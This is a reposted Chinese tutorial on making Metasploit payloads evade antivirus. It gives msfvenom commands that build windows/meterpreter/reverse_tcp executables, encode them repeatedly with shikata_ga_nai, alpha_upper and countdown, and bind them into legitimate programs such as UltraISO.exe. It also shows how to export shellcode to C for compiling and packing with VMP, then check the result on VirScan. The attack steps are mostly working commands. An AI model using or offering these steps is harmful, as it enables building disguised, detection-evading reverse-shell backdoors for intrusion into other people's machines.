msf编码免杀

这篇具有很好参考价值的文章主要介绍了msf编码免杀。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

(一)认识免杀

1、杀软是如何检测出恶意代码的?

2、免杀是做什么?

3、免杀的基本方法有哪些?

(二) 不处理payload直接生成样本进行检测

1、生成后门

2、开启http服务

3、打开Web页

4、在网站上传分析

(三) MSF自编码处理payload生成样本进行检测

1、查看可以用编码模块

 2、使用  x86/shikata_ga_nai 模块

(四) MSF自捆绑处理payload生成样本进行检测

1、使用msfvenom的-x参数

(五)MSF自捆绑+编码处理payload生成样本进行检测

1、结合前二种编码方式我们再次生成样本

2、增大编码次数

(六)MSF多重编码payload生成样本进行检测

(七) 生成Shellcode使用C语言调用

1、直接在linux中利用msf的meterpreter生成的文件以.c形式文件存储,得到机器码

2、改c文件,并编译,并加壳

 3、随便写一个hello world


(一)认识免杀

1、杀软是如何检测出恶意代码的?

        特征码(id)、启发式恶意软件检查和行为

2、免杀是做什么?

对特征进行混淆,打乱代码,避免杀毒软件查杀

3、免杀的基本方法有哪些?
 

自编码处理  自捆绑+编码  多重编码   接口下载式  签名伪装式

针对杀毒软件的基本检测方法,我们可有以下几种方法实现免杀:
VirScan - 多引擎文件在线检测平台

  • 改变特征码
  • 改变行为
  • 其它

(二) 不处理payload直接生成样本进行检测

1、生成后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=your ip   LPORT=4456 -f exe -o payload1.exe

2、开启http服务

python2:

python -m SimpleHTTPServer

pytnon3:

python3 -m http.server

3、打开Web页

打开浏览器 访问 localhost:8000 或者 127.0.0.1:8000,下载有恶意代码的文件

msf编码免杀

 

4、在网站上传分析

VirScan - 多引擎文件在线检测平台

msf编码免杀


(三) MSF自编码处理payload生成样本进行检测

1、查看可以用编码模块

msfvenom --list encoders

msf编码免杀

 2、使用  x86/shikata_ga_nai 模块

  它是免杀中使用频率最高的一个编码器

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai HOST=192.168.x.x LPORT=4456 -f exe -o payload1.exe

 后续方法同上

msf编码免杀


(四) MSF自捆绑处理payload生成样本进行检测

1、使用msfvenom的-x参数

-x 参数可以指定一个可执行文件.exe,将payload与其捆绑

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.x.x  LPORT=4456 -x yourset.exe -f exe -o payload2.exe

其他步骤同上


(五)MSF自捆绑+编码处理payload生成样本进行检测

1、结合前二种编码方式我们再次生成样本

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=4456 -e x86/shikata_ga_nai -x yourset.exe  -i 10 -f exe -o payload3.exe

其他操作同上

2、增大编码次数

我们可以通过增大i的大小,增大成功率。


(六)MSF多重编码payload生成样本进行检测

        通过管道,让msfvenom用不同编码器反复编码进行混淆。使用管道让msfvenom对攻击载荷多重编码,先用shikata_ga_nai编码10次,接着来10次的alpha_upper编码,再来10次的countdown编码,最后才生成以payload5.exe为模板的可执行文件。

msfvenom  -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=192.168.110.110 LPORT=4456 -f raw | msfvenom -e x86/alpha_upper -i 10 -f raw | msfvenom -e x86/countdown -i 10 -x UltraISO.exe -f exe -o payload5.exe

(七) 生成Shellcode使用C语言调用

1、直接在linux中利用msf的meterpreter生成的文件以.c形式文件存储,得到机器码

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=4456 -f c >c0001.c

2、改c文件,并编译,并加壳

msf编码免杀

 3、随便写一个hello world

main() {
printf("hello world\n");
}

然后编译 并加壳

vmp加壳工具文章来源地址https://www.toymoban.com/news/detail-446540.html

到了这里,关于msf编码免杀的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 2、安全开发-Python-Socket编程&端口探针&域名爆破&反弹Shell&编码免杀

    用途:个人学习笔记,欢迎指正! 目录 主要内容: 一、端口扫描(未开防火墙情况) 1、Python关键代码: 2、完整代码:多线程配合Queue进行全端口扫描 二、子域名扫描 三、客户端,服务端Socket编程通信cmd命令执行 1、客户端: 2、服务端: 四、python代码shellCode编码免杀后门上线

    2024年02月22日
    浏览(43)
  • 认识YOLOv5模型结构目录

    接上篇【文献解读】“MOBILEViT:轻量级、通用目的、移动友好的视觉变换器”。-CSDN博客 YOLOv5是一个流行的机器学习模型,用于目标检测任务。根据您希望提升或修改的内容,改进YOLOv5可以涉及多个方面: 模型架构(位于 /models ): 如果希望改变YOLOv5的架构,需要修改通常

    2024年01月21日
    浏览(35)
  • React框架课时二认识项目的结构目录一

    ├── README.md 使用方法的文档 ├── node_modules 所有的依赖安装的目录 ├── package-lock.json 锁定安装时的包的版本号,保证团队的依赖能保证一致。 ├── package.json ├── public 静态公共目录 └── src 开发用的源代码目录 2 图片的演示如图所示 README.md 使用方法的文档

    2024年02月02日
    浏览(77)
  • Linux——认识Linux的目录结构 & 常用命令 & vim命令 & 权限及其控制

    一切皆文件 文件分类 【安装】Linux环境下的 JDK的安装 安装配置 环境变量 1.进程kill -9 运行窗口退出 2.ctrl c退出 ls -a 查看所有文件(包含隐藏) ​ ls -la 查看所有文件详细信息 查看当前文件夹下的文件 在 Linux 系统中,ls 和 ll 命令都是用来列出目录内容的命令,它们的区别

    2024年02月16日
    浏览(60)
  • 绕过杀软添加用户

    方法0、直接运行神器 360shellcode.zip github可搜 方法1、激活GUEST用户 比较好用,试过很多次杀软都不拦截 方法2、net1绕过 net1.exe在C:/windows/system32下 进入到目录下面,此时生成一个asd.txt   此时的asd.txt就和net 一样了,可以执行net user 不会触发火绒告警(有的主机会有的主机不会

    2024年02月06日
    浏览(38)
  • 哥斯拉加密WebShell过杀软

    哥斯拉是继菜刀、蚁剑、冰蝎之后具有更多优点的Webshell管理工具,由java语言开发,如名称一样,他的“凶猛”之处主要体现在: 1、哥斯拉全部类型的shell均过市面所有静态查杀。 2、静态免杀这个问题,要客观;工具放出来之后可能会免杀一段时间,后来就不行了,但是,

    2024年02月11日
    浏览(40)
  • 体积小纯净无打扰,新版微软电脑管家在教国内做杀软

    早在去年初,微软电脑管家就开启了 V1.0 版本内测,咱们也在第一时间替大伙儿体验了一番。 微软电脑管家最初就是专为国内用户推出的,算是真正做到了精简省心,无任何流氓广告弹窗行为。 这与咱们国内各种流氓杀软环境形成了极为鲜明对比。 缺点嘛,初代微软电脑管

    2024年02月10日
    浏览(68)
  • 【微服务】微服务初步认识 - 微服务技术如何学习 · 认识微服务架构

    微服务(1) 微服务只是分布式架构中的一种,而SpringCloud只是解决了服务拆分时的服务治理问题,至于其他的分布式的更复杂的问题并没有明确的给出解决方案,所以微服务不仅仅包含SpringCloud,还包含一些其他的~ 对于SpringCloud相关的微服务(架构)治理工作(大概了解,先不

    2024年02月08日
    浏览(50)
  • 木马免杀(篇三)静态免杀方法

    紧接上一篇,是通过 cs 生成 shellcode 并直接用python 调用动态链接库执行 shellcode 。 生成后的exe文件未进行任何处理。 现在学习一些可以绕过静态免杀的方法。即将文件上传到目标不会被杀软查杀,但这只是静态方面。 动态免杀方面还涉及到很多东西,像进程注入手段。 花指

    2024年02月07日
    浏览(37)
  • 认识 MyBatis + MyBatis如何使用 (MyBatis操作数据库)

    本篇介绍了什么是MyBatis,MyBatis的前期配置,MyBatis操作数据库的两种方式:.xml文件 / 注释,使用MyBatis的一些注意,如有错误,请在评论区指正,让我们一起交流,共同进步! 本文开始 MyBatis(ORM: 对象关系映射框架): 一个持久层框架,也是一个工具实现程序与数据库交互,

    2024年02月14日
    浏览(58)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包